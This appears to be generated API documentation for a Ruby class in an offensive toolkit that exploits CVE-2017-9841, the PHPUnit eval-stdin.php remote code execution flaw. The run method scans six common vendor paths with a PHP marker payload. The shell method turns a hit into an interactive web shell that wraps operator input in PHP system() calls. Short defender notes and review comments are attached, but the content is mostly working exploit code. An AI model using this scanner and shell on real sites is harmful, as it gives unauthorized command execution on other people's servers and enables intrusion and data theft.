Class: Snackhack2::CVE20179841

Inherits:
Object
  • Object
Defined in:
lib/snackhack2/CVE-2017-9841.rb

Instance Attribute Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(site, payload: "<?php echo md5('phpunit_rce'); ?>") ⇒ CVE20179841

Returns a new instance of CVE20179841.



# File 'lib/snackhack2/CVE-2017-9841.rb', line 8

# Builds a checker for CVE-2017-9841 aimed at a single site.
#
# @param site [String] base URL of the site to test; #run joins each
#   candidate path onto it
# @param payload [String] PHP snippet that #run sends as the POST body. The
#   default prints md5('phpunit_rce'), which is the marker #run searches the
#   response for.
def initialize(site, payload: "<?php echo md5('phpunit_rce'); ?>")
  # Nothing has been probed yet, so the finding flag starts out false.
  @site, @payload, @vulnerable = site, payload, false
end

Instance Attribute Details

#ip ⇒ Object

Returns the value of attribute ip.



# File 'lib/snackhack2/CVE-2017-9841.rb', line 6

# Reader for the +ip+ attribute.
#
# NOTE(review): none of the methods shown on this page (initialize, run,
# shell) assigns @ip, so this returns nil unless a writer defined elsewhere
# sets it — confirm whether the attribute is still needed.
#
# @return [Object, nil] the current value of @ip
def ip
  @ip
end

Instance Method Details

#run ⇒ Object



# File 'lib/snackhack2/CVE-2017-9841.rb', line 14

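# Probes a fixed list of common install locations of PHPUnit's eval-stdin.php
# (CVE-2017-9841) under @site and reports the first one that executes the
# payload.
#
# Each candidate URL receives one HTTP POST whose body is @payload. A response
# counts as a hit only when it contains the MD5 digest of "phpunit_rce", i.e.
# the value the default payload computes on the server. The digest does not
# appear in the request itself, so an endpoint that merely echoes the request
# body back is not a match. A custom payload that does not print this digest
# is never reported as a hit.
#
# A miss only means that none of the listed paths answered with the marker; a
# different install path or a filtering proxy produces the same result, so the
# per-path "not vulnerable" line is not proof that the site is clean.
#
# Defender's view: the probe shows up in access logs as POST requests to paths
# ending in phpunit/src/Util/PHP/eval-stdin.php. Upgrading PHPUnit and keeping
# vendor/ (and development dependencies) out of the web root removes the
# exposure.
#
# @return [String, nil] the relative path that answered with the marker, or
#   nil when no candidate did (previously the method fell through and returned
#   the whole path list, which is truthy)
# @raise URI and Net::HTTP errors propagate unchanged
def run
  # MD5 hash of "phpunit_rce", printed by the default payload when it executes
  marker = "6dd70f16549456495373a337e6708865"
  candidates = [
    "yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
  ]

  candidates.each do |path|
    target = File.join(@site, path)
    uri = URI.parse(target)
    request = Net::HTTP::Post.new(uri)
    request.body = @payload.to_s

    response = Net::HTTP.start(uri.hostname, uri.port, use_ssl: uri.scheme == "https") do |http|
      http.request(request)
    end

    # body is nil for a response without an entity; treat that as "no match"
    # instead of raising NoMethodError halfway through the path list
    if response.body.to_s.include?(marker)
      @vulnerable = true
      puts "THIS SITE IS vulnerable!"
      return path
    end

    puts "The site is not vulnerable.... #{target}"
  end

  # explicit nil so callers cannot mistake the candidate list for a finding
  nil
end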

#shell ⇒ Object



# File 'lib/snackhack2/CVE-2017-9841.rb', line 45

# Interactive loop that relays operator-typed lines to the eval-stdin.php
# endpoint found by #run. Does nothing unless #run set @vulnerable.
#
# Each line read from stdin is wrapped in a PHP system() call and POSTed to
# the matching path; the response body is printed. Typing "exit" calls
# Kernel#exit, which ends the whole Ruby process, not just this loop.
#
# Defender's view: on the server every iteration is one HTTP POST to a path
# ending in phpunit/src/Util/PHP/eval-stdin.php whose body (where request
# bodies are captured) starts with "<?php". Upgrading PHPUnit and keeping
# vendor/ and development dependencies out of the web root removes the
# endpoint.
#
# NOTE(review): gets returns nil at end of input, so gets.chomp raises
# NoMethodError when stdin is closed.
# NOTE(review): the input is interpolated verbatim into the PHP source;
# nothing is escaped or validated.
def shell
  # run returns the relative path that answered with the marker and sets
  # @vulnerable as a side effect
  path = self.run
  # only enter the loop when run flagged the site; the loop has no exit
  # condition other than the "exit" command below
  if @vulnerable
    while true
        # prompt for and read one line to send to the server
      
        print(">")
        input = gets.chomp
        if input.eql?("exit")
          exit
        else
          uri = URI.parse(File.join(@site, path))
          request = Net::HTTP::Post.new(uri)
          # takes the input and sends it to the host inside a system() call
          request.body = "<?php system('#{input}'); ?>"

          req_options = {
            use_ssl: uri.scheme == "https",
          }

          response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http|
            http.request(request)
          end
          puts response.body
        end
    end
  end 
end